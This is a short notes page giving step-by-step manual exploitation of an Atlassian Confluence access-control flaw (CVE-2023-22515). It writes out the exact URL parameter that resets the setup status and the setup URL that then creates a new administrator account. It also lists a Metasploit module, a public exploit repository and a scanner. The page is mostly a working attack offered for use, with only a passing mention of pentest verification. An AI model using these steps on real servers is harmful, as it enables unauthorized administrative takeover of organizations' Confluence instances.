Notes: Manual Exploitation of Atlassian Confluence
Nov 11, 2023
Note: This process preserves existing admin accounts.
- Verify Version
2. Insert the following into the URL to do a reset on an administrator account:
server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
3. Confirm success message after going to the url manually from step 2.
4. Go to the following URL:
http://<target_ip>:8090/setup/setupadministrator-start.action
5. Click start
At this point congrats. You are a confluence administrator.
Automated Exploitation links
Metasploit:
multi/http/atlassian_confluence_rce_cve_2023_22515Automated Exploit from github:
https://github.com/Chocapikk/CVE-2023-22515Scanner for pentesting verfication:
https://github.com/ErikWynter/CVE-2023-22515-Scan